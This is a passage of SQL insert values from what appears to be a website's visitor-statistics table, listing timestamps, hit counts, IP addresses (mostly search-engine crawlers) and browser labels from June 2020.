,1,1,0,0,'91.196.178.179','chrome'),(517342,1593185485,1,1,0,0,'157.55.39.180','other'),(517343,1593185669,2,2,0,0,'66.249.70.70','chrome'),(517344,1593185848,5,5,0,0,'66.249.70.69','chrome'),(517345,1593185941,8,8,0,0,'185.11.82.228','other'),(517346,1593187802,3,3,0,0,'66.249.70.70','chrome'),(517347,1593187880,2,2,0,0,'66.249.70.69','chrome'),(517348,1593187976,1,1,0,0,'66.249.70.72','chrome'),(517349,1593187988,1,1,0,0,'213.180.203.16','other'),(517350,1593188508,4,4,0,0,'62.210.111.97','chrome'),(517351,1593189236,1,1,0,0,'66.249.64.36','chrome'),(517352,1593189405,2,2,0,0,'66.249.64.38','chrome'),(517353,1593189421,1,1,0,0,'213.180.203.16','other'),(517354,1593189502,4,4,0,0,'66.249.70.70','chrome'),(517355,1593189702,1,1,0,0,'178.154.200.222','other'),(517356,1593190323,2,2,0,0,'66.249.70.72','chrome'),(517357,1593190573,1,1,0,0,'154.51.131.142','chrome'),(517358,1593190845,4,4,0,0,'66.249.70.70','chrome'),(517359,1593190855,3,3,0,0,'66.249.70.69','chrome'),(517360,1593191254,2,2,0,0,'8.29.198.26','other'),(517361,1593191257,1,1,0,0,'178.154.200.222','other'),(517362,1593192307,5,5,0,0,'66.249.70.69','chrome'),(517363,1593192473,3,3,0,0,'66.249.64.38','chrome'),(517364,1593193611,4,4,0,0,'66.249.70.69','chrome'),(517365,1593194299,2,2,0,0,'66.249.70.70','chrome'),(517366,1593194326,1,1,0,0,'66.249.64.36','chrome'),(517367,1593194500,1,1,0,0,'66.249.64.38','chrome'),(517368,1593195149,1,1,0,0,'194.61.24.94','other'),(517369,1593195702,3,3,0,0,'66.249.70.69','chrome'),(517370,1593195711,3,3,0,0,'66.249.70.70','chrome'),(517371,1593195757,3,3,0,0,'66.249.70.72','chrome'),(517372,1593196317,1,1,0,0,'66.249.64.38','chrome'),(517373,1593196816,1,1,0,0,'66.249.70.70','chrome'),(517374,1593196991,1,1,0,0,'66.249.64.36','chrome'),(517375,1593197669,2,2,0,0,'66.249.70.72','chrome'),(517376,1593198192,4,4,0,0,'66.249.70.70','chrome'),(517377,1593198197,3,3,0,0,'66.249.70.69','chrome'),(517378,1593199187,1,1,0,0,'66.249.64.38','chrome'),(517379,1593199573,1,1,0,0,'157.55.39.180','other'),(517380,1593199963,1,1,0,0,'66.249.64.33','chrome'),(517381,1593200779,1,1,0,0,'66.249.70.70','chrome'),(517382,1593200890,1,1,0,0,'37.55.227.171','chrome'),(517383,1593201439,1,1,0,0,'51.91.129.4','firefox'),(517384,1593201554,1,1,0,0,'66.249.70.72','chrome'),(517385,1593201759,1,1,0,0,'88.155.160.184','chrome'),(517386,1593201852,1,1,0,0,'66.249.64.33','chrome'),(517387,1593201931,2,2,0,0,'66.249.70.69','chrome'),(517388,1593202079,1,1,0,0,'8.29.198.25','other'),(517389,1593202129,1,1,0,0,'8.29.198.26','other'),(517390,1593202184,1,1,0,0,'66.249.70.70','chrome'),(517391,1593202375,1,1,0,0,'66.249.64.36','chrome'),(517392,1593203319,1,1,0,0,'66.249.64.33','chrome'),(517393,1593203797,2,1,1,0,'66.249.70.69',''),(517394,1593204592,1,1,0,0,'66.249.70.72','chrome'),(517395,1593205273,1,1,0,0,'66.249.64.36','chrome'),(517396,1593205308,1,1,0,0,'89.19.48.205','chrome'),(517397,1593205912,1,1,0,0,'178.154.200.222','other'),(517398,1593206722,8,8,0,0,'185.11.82.228','other'),(517399,1593206745,1,1,0,0,'66.249.70.69','chrome'),(517400,1593207527,1,1,0,0,'213.180.203.90','other'),(517401,1593207541,1,1,0,0,'66.249.64.36','chrome'),(517402,1593207616,1,1,0,0,'66.249.70.70','chrome'),(517403,1593207653,2,2,0,0,'66.249.64.38','chrome'),(517404,1593207907,1,1,0,0,'66.249.64.33','chrome'),(517405,1593208081,1,1,0,0,'178.154.200.92','other'),(517406,1593208082,1,1,0,0,'66.249.70.72','chrome'),(517407,1593208663,1,1,0,0,'213.180.203.16','other'),(517408,1593208937,1,1,0,0,'66.249.70.70','chrome'),(517409,1593208988,1,1,0,0,'66.249.70.72','chrome'),(517410,1593209071,1,1,0,0,'66.249.64.38','chrome'),(517411,1593209107,1,1,0,0,'66.249.64.36','chrome'),(517412,1593209134,1,1,0,0,'66.249.70.69','chrome'),(517413,1593210736,1,1,0,0,'185.11.167.118','other'),(517414,1593210899,1,1,0,0,'66.249.70.72','chrome'),(517415,1593211169,1,1,0,0,'66.249.70.70','chrome'),(517416,1593211250,1,1,0,0,'66.249.64.36','chrome'),(517417,1593211426,2,2,0,0,'66.249.64.38','chrome'),(517418,1593211471,1,1,0,0,'66.249.64.33','chrome'),(517419,1593211542,1,1,0,0,'178.154.200.216','other'),(517420,1593212010,1,1,0,0,'213.180.203.16','other'),(517421,1593212067,1,1,0,0,'157.55.39.180','other'),(517422,1593212343,1,1,0,0,'178.154.200.97','other'),(517423,1593212821,4,4,0,0,'66.249.70.70','chrome'),(517424,1593212855,2,2,0,0,'66.249.70.69','chrome'),(517425,1593212907,1,1,0,0,'8.29.198.25','other'),(517426,1593212967,1,1,0,0,'8.29.198.26','other'),(517427,1593213209,1,1,0,0,'66.249.64.33','chrome'),(517428,1593213667,1,1,0,0,'66.249.64.36','chrome'),(517429,1593214309,1,1,0,0,'178.154.200.222','other'),(517430,1593214351,1,1,0,0,'178.154.200.87','other'),(517431,1593214547,1,1,0,0,'193.58.104.216','chrome'),(517432,1593215146,1,1,0,0,'66.249.70.70','chrome'),(517433,1593215210,1,1,0,0,'66.249.70.69','chrome'),(517434,1593215506,1,1,0,0,'45.133.170.47','chrome'),(517435,1593215706,1,1,0,0,'62.205.134.182','other'),(517436,1593216316,1,1,0,0,'66.249.70.72','chrome'),(517437,1593216320,3,3,0,0,'66.249.70.70','chrome'),(517438,1593218498,1,1,0,0,'66.249.70.69','chrome'),(517439,1593219117,1,1,0,0,'66.249.70.70','chrome'),(517440,1593219398,3,3,0,0,'178.154.200.222','other'),(517441,1593219511,2,2,0,0,'66.249.70.72','chrome'),(517442,1593219677,2,2,0,0,'66.249.64.36','chrome'),(517443,1593220071,3,3,0,0,'66.249.70.69','chrome'),(517444,1593221195,2,2,0,0,'178.154.200.222','other'),(517445,1593221208,1,1,0,0,'66.249.70.69','chrome'),(517446,1593221627,1,1,0,0,'66.249.70.70','chrome'),(517447,1593223314,1,1,0,0,'178.154.200.97','other'),(517448,1593223605,1,1,0,0,'66.249.70.69','chrome'),(517449,1593223727,1,1,0,0,'8.29.198.26','other'),(517450,1593223797,1,1,0,0,'8.29.198.25','other'),(517451,1593224281,2,2,0,0,'178.154.200.222','other'),(517452,1593225908,1,1,0,0,'178.154.200.222','other'),(517453,1593225985,1,1,0,0,'66.249.64.36','chrome'),(517454,1593226149,1,1,0,0,'66.249.64.38','chrome'),(517455,1593226319,2,2,0,0,'66.249.70.70','chrome'),(517456,1593227047,1,1,0,0,'40.87.99.25','other'),(517457,1593227518,2,2,0,0,'178.154.200.222','other'),(517458,1593228195,1,1,0,0,'66.249.70.69','chrome'),(517459,1593228323,1,1,0,0,'213.180.203.29','other'),(517460,1593229208,2,2,0,0,'178.154.200.222','other'),(517461,1593229405,1,1,0,0,'92.38.136.69','chrome'),(517462,1593230038,2,2,0,0,'66.249.70.69','chrome'),(517463,1593230225,1,1,0,0,'178.154.200.220','other'),(517464,1593230821,2,2,0,0,'66.249.70.70','chrome'),(517465,1593232009,1,1,0,0,'213.180.203.16','other'),(517466,1593232029,2,2,0,0,'66.249.70.70','chrome'),(517467,1593233034,2,2,0,0,'66.249.70.69','chrome'),(517468,1593233167,1,1,0,0,'66.249.70.72','chrome'),(517469,1593233180,5,5,0,0,'66.249.70.70','chrome'),(517470,1593233322,1,1,0,0,'66.249.64.33','chrome'),(517471,1593233494,1,1,0,0,'62.205.134.182','other'),(517472,1593234363,3,3,0,0,'66.249.70.69','chrome'),(517473,1593234500,2,2,0,0,'66.249.70.72','chrome'),(517474,1593234556,2,2,0,0,'8.29.198.27','other'),(517475,1593234715,1,1,0,0,'207.46.13.116','other'),(517476,1593235028,2,2,0,0,'213.180.203.16','other'),(517477,1593235326,1,1,0,0,'178.154.200.222','other'),(517478,1593235519,1,1,0,0,'66.249.70.69','chrome'),(517479,1593235958,1,1,0,0,'178.154.200.191','other'),(517480,1593236191,1,1,0,0,'66.249.64.33','chrome'),(517481,1593236242,1,1,0,0,'91.196.178.93','chrome'),(517482,1593236243,1,1,0,0,'66.249.83.222','chrome'),(517483,1593236308,1,1,0,0,'66.249.64.36','chrome'),(517484,1593236456,2,2,0,0,'178.154.200.222','other'),(517485,1593236805,2,2,0,0,'66.249.64.38','chrome'),(517486,1593237121,2,2,0,0,'66.249.70.70','chrome'),(517487,1593237192,1,1,0,0,'66.249.64.33','chrome'),(517488,1593237516,3,3,0,0,'41.203.16.122','chrome'),(517489,1593237650,1,1,0,0,'89.46.105.252','chrome'),(517490,1593238146,2,2,0,0,'66.249.70.69','chrome'),(517491,1593238238,1,1,0,0,'66.249.64.33','chrome'),(517492,1593239022,1,1,0,0,'66.249.70.70','chrome'),(517493,1593239557,2,2,0,0,'178.154.200.222','other'),(517494,1593239662,1,1,0,0,'141.8.193.210','chrome'),(517495,1593239678,2,2,0,0,'66.249.70.69','chrome'),(517496,1593239767,1,1,0,0,'178.154.200.196','other'),(517497,1593239981,1,1,0,0,'66.249.64.33','chrome'),(517498,1593240777,2,2,0,0,'178.154.200.222','other'),(517499,1593241145,1,1,0,0,'66.249.70.72','chrome'),(517500,1593241617,2,2,0,0,'45.32.127.11','chrome'),(517501,1593242205,1,1,0,0,'66.249.64.36','chrome'),(517502,1593242517,2,2,0,0,'66.249.70.72','chrome'),(517503,1593243044,1,1,0,0,'207.46.13.116','other'),(517504,1593243384,1,1,0,0,'203.217.140.107','chrome'),(517505,1593243393,2,2,0,0,'66.249.70.70','chrome'),(517506,1593244146,1,1,0,0,'213.180.203.140','other'),(517507,1593244237,1,1,0,0,'131.220.6.152','chrome'),(517508,1593244292,1,1,0,0,'185.208.164.125','chrome'),(517509,1593244953,2,2,0,0,'178.154.200.222','other'),(517510,1593245140,3,3,0,0,'66.249.70.70','chrome'),(517511,1593245198,1,1,0,0,'66.249.64.33','chrome'),(517512,1593245291,4,4,0,0,'109.70.111.112','chrome'),(517513,1593245378,1,1,0,0,'8.29.198.27','other'),(517514,1593245384,1,1,0,0,'192.254.192.147','chrome'),(517515,1593245427,1,1,0,0,'66.249.64.38','chrome'),(517516,1593245451,1,1,0,0,'66.249.64.36','chrome'),(517517,1593245453,1,1,0,0,'8.29.198.25','other'),(517518,1593245492,1,1,0,0,'51.68.11.215','chrome'),(517519,1593245608,1,1,0,0,'88.99.26.12','chrome'),(517520,1593246373,1,1,0,0,'66.249.64.38','chrome'),(517521,1593246414,1,1,0,0,'66.249.70.69','chrome'),(517522,1593246483,1,1,0,0,'207.46.13.13','other'),(517523,1593247455,1,1,0,0,'70.32.23.31','chrome'),(517524,1593247811,2,2,0,0,'66.249.70.70','chrome'),(517525,1593247944,1,1,0,0,'46.21.198.188','chrome'),(517526,1593248188,1,1,0,0,'213.180.203.109','other'),(517527,1593248290,8,8,0,0,'185.11.82.228','other'),(517528,1593248568,1,1,0,0,'66.249.70.69','chrome'),(517529,1593248575,3,3,0,0,'66.249.64.38','chrome'),(517530,1593248920,1,1,0,0,'66.249.64.33','chrome'),(517531,1593249145,3,3,0,0,'66.249.70.72','chrome'),(517532,1593249191,1,1,0,0,'157.52.252.150','chrome'),(517533,1593249202,1,1,0,0,'81.88.49.48','chrome'),(517534,1593249466,1,1,0,0,'108.175.9.28','chrome'),(517535,1593249746,4,4,0,0,'66.249.70.69','chrome'),(517536,1593250351,2,2,0,0,'66.249.70.72','chrome'),(517537,1593250511,1,1,0,0,'66.249.70.70','chrome'),(517538,1593250899,2,2,0,0,'192.185.81.183','chrome'),(517539,1593250926,1,1,0,0,'178.154.200.222','other'),(517540,1593250975,2,2,0,0,'193.202.110.21','chrome'),(517541,1593251541,1,1,0,0,'102.165.1.52','chrome'),(517542,1593251591,1,1,0,0,'213.180.203.16','other'),(517543,1593252067,1,1,0,0,'66.249.64.38','chrome'),(517544,1593252192,2,2,0,0,'66.249.70.72','chrome'),(517545,1593252204,2,2,0,0,'66.249.70.70','chrome'),(517546,1593252213,1,1,0,0,'66.249.70.69','chrome'),(517547,1593252508,1,1,0,0,'178.154.200.196','other'),(517548,1593252800,1,1,0,0,'178.154.200.222','other'),(517549,1593253507,3,3,0,0,'66.249.70.69','chrome'),(517550,1593254335,1,1,0,0,'66.249.64.38','chrome'),(517551,1593254337,2,2,0,0,'66.249.70.70','chrome'),(517552,1593254590,2,2,0,0,'66.249.70.69','chrome'),(517553,1593254862,1,1,0,0,'178.154.200.222','other'),(517554,1593255172,1,1,0,0,'109.74.154.72','chrome'),(517555,1593255387,1,1,0,0,'66.249.70.70','chrome'),(517556,1593255878,2,2,0,0,'66.249.70.69','chrome'),(517557,1593256070,1,1,0,0,'66.249.64.38','chrome'),(517558,1593256202,1,1,0,0,'8.29.198.25','other'),(517559,1593256275,1,1,0,0,'8.29.198.27','other'),(517560,1593256332,2,2,0,0,'66.249.70.72','chrome'),(517561,1593257272,1,0,1,0,'66.249.70.70',''),(517562,1593257791,4,4,0,0,'66.249.70.70','chrome'),(517563,1593257886,1,1,0,0,'66.249.64.36','chrome'),(517564,1593257891,1,1,0,0,'66.249.64.33','chrome'),(517565,1593258056,1,1,0,0,'178.154.200.222','other'),(517566,1593258157,2,2,0,0,'66.249.70.69','chrome'),(517567,1593258198,1,1,0,0,'213.180.203.6','other'),(517568,1593258226,1,1,0,0,'66.249.64.38','chrome'),(517569,1593258616,1,1,0,0,'178.154.200.196','other'),(517570,1593258936,2,2,0,0,'66.249.70.70','chrome'),(517571,1593259115,6,6,0,0,'66.249.70.69','chrome'),(517572,1593259326,6,6,0,0,'66.249.70.72','chrome'),(517573,1593259393,1,1,0,0,'178.154.200.220','other'),(517574,1593259404,1,1,0,0,'66.249.64.38','chrome'),(517575,1593259561,1,1,0,0,'209.17.97.2','other'),(517576,1593259818,1,1,0,0,'178.154.200.222','other'),(517577,1593259827,1,1,0,0,'66.249.64.33','chrome'),(517578,1593261094,1,1,0,0,'178.154.200.222','other'),(517579,1593261097,3,3,0,0,'66.249.70.70','chrome'),(517580,1593261113,1,1,0,0,'17.58.99.7','other'),(517581,1593261390,4,4,0,0,'66.249.70.69','chrome'),(517582,1593261858,1,1,0,0,'66.249.64.36','chrome'),(517583,1593262018,2,2,0,0,'66.249.70.70','chrome'),(517584,1593262312,1,1,0,0,'66.249.64.33','chrome'),(517585,1593262367,1,1,0,0,'128.124.88.53','chrome'),(517586,1593262816,2,2,0,0,'66.249.70.69','chrome'),(517587,1593262949,2,2,0,0,'66.249.70.72','chrome'),(517588,1593263302,2,2,0,0,'66.249.64.38','chrome'),(517589,1593263305,1,1,0,0,'192.99.6.138','other'),(517590,1593263862,1,1,0,0,'66.249.70.69','chrome'),(517591,1593264671,1,1,0,0,'192.71.3.26','other'),(517592,1593264747,1,1,0,0,'91.196.178.21','chrome'),(517593,1593264954,5,5,0,0,'66.249.70.72','chrome'),(517594,1593265040,5,5,0,0,'66.249.70.69','chrome'),(517595,1593265100,4,4,0,0,'66.249.70.70','chrome'),(517596,1593265421,1,1,0,0,'178.154.200.196','other'),(517597,1593265489,3,3,0,0,'66.249.64.36','chrome'),(517598,1593265503,1,1,0,0,'178.154.200.22','other'),(517599,1593265770,1,1,0,0,'66.249.64.38','chrome'),(517600,1593265984,2,2,0,0,'66.249.64.33','chrome'),(517601,1593266315,5,5,0,0,'66.249.70.69','chrome'),(517602,1593266357,1,1,0,0,'178.154.200.112','other'),(517603,1593266453,3,3,0,0,'66.249.70.70','chrome'),(517604,1593266552,2,2,0,0,'178.92.75.217','chrome'),(517605,1593266742,1,1,0,0,'91.123.146.45','chrome'),(517606,1593266760,2,2,0,0,'207.46.13.116','other'),(517607,1593267024,1,1,0,0,'8.29.198.27','other'),(517608,1593267044,1,1,0,0,'66.249.64.36','chrome'),(517609,1593267077,1,1,0,0,'178.154.200.222','other'),(517610,1593267100,1,1,0,0,'8.29.198.26','other'),(517611,1593267229,2,2,0,0,'66.249.70.72','chrome'),(517612,1593267270,1,1,0,0,'66.249.64.38','chrome'),(517613,1593267395,3,3,0,0,'66.249.70.70','chrome'),(517614,1593267594,1,1,0,0,'52.148.253.191','chrome'),(517615,1593267950,1,1,0,0,'91.123.146.45','chrome'),(517616,1593268356,3,3,0,0,'66.249.70.72','chrome'),(517617,1593268388,4,4,0,0,'66.249.70.69','chrome'),(517618,1593268444,1,1,0,0,'66.249.70.70','chrome'),(517619,1593268467,2,2,0,0,'66.249.64.33','chrome'),(517620,1593268558,1,1,0,0,'66.249.64.36','chrome'),(517621,1593269326,1,1,0,0,'66.249.64.38','chrome'),(517622,1593269586,4,4,0,0,'66.249.64.33','chrome'),(517623,1593269691,4,4,0,0,'66.249.70.69','chrome'),(517624,1593269980,3,3,0,0,'66.249.70.72','chrome'),(517625,1593270097,5,5,0,0,'66.249.70.70','chrome'),(517626,1593270765,1,1,0,0,'66.249.64.33','chrome'),(517627,1593270998,1,1,0,0,'91.193.166.99','chrome'),(517628,1593271099,1,1,0,0,'66.249.64.36','chrome'),(517629,1593271227,2,2,0,0,'66.249.70.72','chrome'),(517630,1593271383,1,1,0,0,'66.249.64.38','chrome'),(517631,1593271502,1,1,0,0,'209.17.97.58','other'),(517632,1593271700,3,3,0,0,'66.249.70.70','chrome'),(517633,1593272009,4,4,0,0,'66.249.70.69','chrome'),(517634,1593272582,1,1,0,0,'66.249.70.72','chrome'),(517635,1593272634,2,2,0,0,'66.249.64.36','chrome'),(517636,1593273000,3,3,0,0,'66.249.70.70','chrome'),(517637,1593273202,1,1,0,0,'207.46.13.13','other'),(517638,1593273263,1,1,0,0,'66.249.64.33','chrome'),(517639,1593273616,2,2,0,0,'66.249.70.72','chrome'),(517640,1593273828,1,1,0,0,'194.61.24.94','other'),(517641,1593273845,1,1,0,0,'66.249.70.69','chrome'),(517642,1593274024,1,1,0,0,'66.249.70.70','chrome'),(517643,1593274571,1,1,0,0,'66.249.64.36','chrome'),(517644,1593274799,1,1,0,0,'207.46.13.116','other'),(517645,1593275306,1,1,0,0,'91.196.178.180','chrome'),(517646,1593275437,1,1,0,0,'66.249.70.72','chrome'),(517647,1593275469,1,1,0,0,'207.46.13.13','other'),(517648,1593275735,1,1,0,0,'66.249.70.70','chrome'),(517649,1593275896,1,1,0,0,'66.249.64.33','chrome'),(517650,1593275955,1,1,0,0,'66.249.70.69','chrome'),(517651,1593276425,2,2,0,0,'202.8.122.202','chrome'),(517652,1593276714,1,1,0,0,'207.46.13.116','other'),(517653,1593277127,2,2,0,0,'186.232.248.40','chrome'),(517654,1593277138,1,1,0,0,'66.249.64.33','chrome'),(517655,1593277249,3,3,0,0,'66.249.70.72','chrome'),(517656,1593277349,6,6,0,0,'66.249.70.70','chrome'),(517657,1593277630,2,2,0,0,'66.249.70.69','chrome'),(517658,1593277840,2,2,0,0,'178.154.200.222','other'),(517659,1593277848,1,1,0,0,'8.29.198.26','other'),(517660,1593277921,1,1,0,0,'8.29.198.25','other'),(517661,1593278781,8,8,0,0,'185.11.82.228','other'),(517662,1593279408,1,1,0,0,'207.46.13.116','other'),(517663,1593279519,1,1,0,0,'66.249.64.36','chrome'),(517664,1593279679,1,1,0,0,'66.249.64.33','chrome'),(517665,1593279844,1,1,0,0,'66.249.70.69','chrome'),(517666,1593280212,8,8,0,0,'185.11.82.228','other'),(517667,1593280341,1,1,0,0,'178.154.200.222','other'),(517668,1593280720,2,2,0,0,'66.249.70.70','chrome'),(517669,1593280862,2,2,0,0,'66.249.70.69','chrome'),(517670,1593281360,1,1,0,0,'66.102.9.167','chrome'),(517671,1593281550,1,1,0,0,'66.249.64.36','chrome'),(517672,1593281675,8,8,0,0,'185.11.82.228','other'),(517673,1593281683,1,1,0,0,'178.154.200.196','other'),(517674,1593281727,1,1,0,0,'213.180.203.16','other'),(517675,1593281958,1,1,0,0,'66.249.70.69','chrome'),(517676,1593282503,1,1,0,0,'34.70.109.186','firefox'),(517677,1593282663,1,1,0,0,'178.154.200.222','other'),(517678,1593282862,3,3,0,0,'66.249.70.70','chrome'),(517679,1593282880,1,1,0,0,'66.249.70.69','chrome'),(517680,1593282969,1,1,0,0,'213.180.203.16','other'),(517681,1593283102,8,8,0,0,'185.11.82.228','other'),(517682,1593283812,2,2,0,0,'207.46.13.116','other'),(517683,1593284239,1,1,0,0,'178.154.200.220','other'),(517684,1593284426,2,2,0,0,'66.249.70.69','chrome'),(517685,1593284537,8,8,0,0,'185.11.82.228','other'),(517686,1593284775,1,1,0,0,'66.249.70.72','chrome'),(517687,1593284939,1,1,0,0,'66.249.64.33','chrome'),(517688,1593285671,1,1,0,0,'178.154.200.92','other'),(517689,1593285980,1,1,0,0,'66.249.70.69','chrome'),(517690,1593285989,1,1,0,0,'45.136.174.205','other'),(517691,1593285991,1,1,0,0,'213.180.203.64','other'),(517692,1593286004,8,8,0,0,'185.11.82.228','other'),(517693,1593286176,1,1,0,0,'66.249.64.38','chrome'),(517694,1593286214,1,1,0,0,'178.154.200.191','other'),(517695,1593286300,1,1,0,0,'66.249.64.33','chrome'),(517696,1593286322,1,1,0,0,'213.180.203.192','other'),(517697,1593286637,3,3,0,0,'66.249.70.72','chrome'),(517698,1593287176,1,1,0,0,'66.249.70.70','chrome'),(517699,1593287475,8,8,0,0,'185.11.82.228','other'),(517700,1593287708,1,1,0,0,'178.154.200.222','other'),(517701,1593287938,1,1,0,0,'66.249.70.69','chrome'),(517702,1593288333,2,1,1,0,'66.249.64.33',''),(517703,1593288669,1,1,0,0,'8.29.198.26','other'),(517704,1593288751,1,1,0,0,'8.29.198.25','other'),(517705,1593288950,8,8,0,0,'185.11.82.228','other'),(517706,1593289684,1,1,0,0,'178.154.200.216','other'),(517707,1593289898,1,1,0,0,'66.249.70.70','chrome'),(517708,1593289973,1,1,0,0,'213.180.203.16','other'),(517709,1593290009,1,1,0,0,'178.154.200.222','other'),(517710,1593290405,8,8,0,0,'185.11.82.228','other'),(517711,1593290457,1,1,0,0,'66.249.70.72','chrome'),(517712,1593290902,2,2,0,0,'207.46.13.13','other'),(517713,1593291403,1,1,0,0,'178.154.200.57','other'),(517714,1593291790,2,2,0,0,'66.249.70.69','chrome'),(517715,1593291879,1,1,0,0,'66.249.70.70','chrome'),(517716,1593291946,1,1,0,0,'66.249.64.38','chrome'),(517717,1593291972,8,8,0,0,'185.11.82.228','other'),(517718,1593293409,1,1,0,0,'207.46.13.13','other'),(517719,1593293442,1,1,0,0,'66.249.70.69','chrome'),(517720,1593293501,8,8,0,0,'185.11.82.228','other'),(517721,1593294132,1,1,0,0,'66.249.70.70','chrome'),(517722,1593294522,1,1,0,0,'207.46.13.13','other'),(517723,1593294983,8,8,0,0,'185.11.82.228','other'),(517724,1593295268,1,1,0,0,'207.46.13.116','other'),(517725,1593295471,1,1,0,0,'66.249.70.69','chrome'),(517726,1593295570,1,1,0,0,'66.249.64.36','chrome'),(517727,1593296442,8,8,0,0,'185.11.82.228','other'),(517728,1593297978,1,1,0,0,'66.249.64.33','chrome'),(517729,1593298034,8,8,0,0,'185.11.82.228','other'),(517730,1593298727,1,0,1,0,'66.249.70.70',''),(517731,1593299284,1,1,0,0,'66.249.70.70','chrome'),(517732,1593299478,8,8,0,0,'185.11.82.228','other'),(517733,1593299502,1,1,0,0,'8.29.198.26','other'),(517734,1593299575,1,1,0,0,'8.29.198.25','other'),(517735,1593300177,1,1,0,0,'18.232.54.61','chrome'),(517736,1593300939,8,8,0,0,'185.11.82.228','other'),(517737,1593301400,1,1,0,0,'66.249.70.72','chrome'),(517738,1593301727,1,1,0,0,'207.46.13.116','other'),(517739,1593301907,1,1,0,0,'66.249.70.70','chrome'),(517740,1593301937,1,1,0,0,'207.46.13.13','other'),(517741,1593302106,1,1,0,0,'62.205.134.182','other'),(517742,1593302421,8,8,0,0,'185.11.82.228','other'),(517743,1593302774,1,1,0,0,'66.249.70.69','chrome'),(517744,1593303011,2,2,0,0,'66.249.70.72','chrome'),(517745,1593303656,2,2,0,0,'27.124.5.49','chrome'),(517746,1593303893,8,8,0,0,'185.11.82.228','other'),(517747,1593305072,1,1,0,0,'66.249.70.69','chrome'),(517748,1593305351,8,8,0,0,'185.11.82.228','other'),(517749,1593306206,1,1,0,0,'66.249.64.36','chrome'),(517750,1593306216,1,1,0,0,'66.249.64.33','chrome'),(517751,1593306386,1,1,0,0,'66.249.70.70','chrome'),(517752,1593306437,1,1,0,0,'66.249.70.72','chrome'),(517753,1593306776,8,8,0,0,'185.11.82.228','other'),(517754,1593306780,1,1,0,0,'66.249.70.69','chrome'),(517755,1593307755,1,1,0,0,'37.143.62.255','chrome'),(517756,1593307765,1,1,0,0,'66.249.70.72','chrome'),(517757,1593307998,1,1,0,0,'66.249.64.33','chrome'),(517758,1593308277,8,8,0,0,'185.11.82.228','other'),(517759,1593308797,1,1,0,0,'66.249.70.69','chrome'),(517760,1593309723,8,8,0,0,'185.11.82.228','other'),(517761,1593309793,2,2,0,0,'66.249.64.38','chrome'),(517762,1593310061,1,1,0,0,'66.249.64.36','chrome'),(517763,1593310093,2,2,0,0,'66.249.70.69','chrome'),(517764,1593310323,1,1,0,0,'8.29.198.25','other'),(517765,1593310398,1,1,0,0,'8.29.198.26','other'),(517766,1593311124,8,8,0,0,'185.11.82.228','other'),(517767,1593311406,3,3,0,0,'66.249.70.69','chrome'),(517768,1593311470,2,2,0,0,'66.249.70.72','chrome'),(517769,1593311475,1,1,0,0,'66.249.70.70','chrome'),(517770,1593311775,1,1,0,0,'66.249.64.33','chrome'),(517771,1593312544,8,8,0,0,'185.11.82.228','other'),(517772,1593312692,2,2,0,0,'66.249.70.72','chrome'),(517773,1593313566,2,2,0,0,'66.249.70.70','chrome'),(517774,1593313910,1,1,0,0,'66.249.70.72','chrome'),(517775,1593313924,8,8,0,0,'185.11.82.228','other'),(517776,1593314025,1,1,0,0,'66.249.70.69','chrome'),(517777,1593315305,1,1,0,0,'66.249.64.38','chrome'),(517778,1593315367,8,8,0,0,'185.11.82.228','other'),(517779,1593315612,2,2,0,0,'66.249.70.69','chrome'),(517780,1593315676,1,1,0,0,'66.249.64.33','chrome'),(517781,1593315735,3,3,0,0,'66.249.70.70','chrome'),(517782,1593316788,8,8,0,0,'185.11.82.228','other'),(517783,1593316940,1,1,0,0,'66.249.64.36','chrome'),(517784,1593317057,3,3,0,0,'66.249.64.33','chrome'),(517785,1593318220,8,8,0,0,'185.11.82.228','other'),(517786,1593318429,3,3,0,0,'66.249.70.72','chrome'),(517787,1593318431,2,2,0,0,'66.249.70.70','chrome'),(517788,1593318499,2,2,0,0,'66.249.70.69','chrome'),(517789,1593318700,1,1,0,0,'38.99.62.94','other'),(517790,1593319653,8,8,0,0,'185.11.82.228','other'),(517791,1593320010,1,1,0,0,'62.205.134.182','other'),(517792,1593320079,1,1,0,0,'66.249.70.70','chrome'),(517793,1593320172,2,2,0,0,'66.249.70.69','chrome'),(517794,1593320351,3,3,0,0,'66.249.70.72','chrome'),(517795,1593321043,1,1,0,0,'66.249.64.36','chrome'),(517796,1593321107,8,8,0,0,'185.11.82.228','other'),(517797,1593321142,2,2,0,0,'8.29.198.26','other'),(517798,1593321151,2,2,0,0,'34.67.238.27','chrome'),(517799,1593321218,3,3,0,0,'35.193.29.169','chrome'),(517800,1593321234,2,2,0,0,'35.222.49.113','chrome'),(517802,1593321245,2,2,0,0,'104.197.83.198','chrome'),(517804,1593321302,3,3,0,0,'34.66.40.127','chrome'),(517805,1593322374,3,3,0,0,'66.249.70.72','chrome'),(517806,1593322379,2,2,0,0,'66.249.64.38','chrome'),(517807,1593322526,1,1,0,0,'154.81.86.238','chrome'),(517808,1593322595,2,2,0,0,'66.249.70.69','chrome'),(517809,1593322615,8,8,0,0,'185.11.82.228','other'),(517810,1593323495,1,1,0,0,'45.89.241.229','chrome'),(517811,1593324096,8,8,0,0,'185.11.82.228','other'),(517812,1593324179,1,1,0,0,'185.230.127.20','msie'),(517813,1593324202,1,1,0,0,'162.241.5.177','chrome'),(517814,1593324229,1,1,0,0,'66.249.64.36','chrome'),(517815,1593324231,3,3,0,0,'66.249.64.33','chrome'),(517816,1593324575,3,3,0,0,'66.249.70.72','chrome'),(517817,1593324579,1,1,0,0,'66.249.70.69','chrome'),(517818,1593324939,1,1,0,0,'66.249.64.38','chrome'),(517819,1593324971,1,1,0,0,'207.46.13.116','other'),(517820,1593325195,3,3,0,0,'66.249.70.70','chrome'),(517821,1593325588,8,8,0,0,'185.11.82.228','other'),(517822,1593325850,1,1,0,0,'66.249.64.36','chrome'),(517823,1593326479,1,1,0,0,'66.249.70.72','chrome'),(517824,1593326565,3,3,0,0,'66.249.70.69','chrome'),(517825,1593326971,1,1,0,0,'89.19.48.123','chrome'),(517826,1593327048,8,8,0,0,'185.11.82.228','other'),(517827,1593327229,1,1,0,0,'51.158.169.206','other'),(517828,1593327705,1,1,0,0,'66.102.9.167','chrome'),(517829,1593327915,1,1,0,0,'66.249.64.36','chrome'),(517830,1593327917,1,1,0,0,'66.249.64.38','chrome'),(517831,1593328055,2,2,0,0,'66.249.70.70','chrome'),(517832,1593328057,4,3,1,0,'66.249.70.69',''),(517833,1593328300,2,2,0,0,'66.249.70.69','chrome'),(517834,1593328499,1,1,0,0,'207.46.13.13','other'),(517835,1593328591,8,8,0,0,'185.11.82.228','other'),(517836,1593328672,1,1,0,0,'207.46.13.116','other'),(517837,1593329667,3,3,0,0,'66.249.70.69','chrome'),(517838,1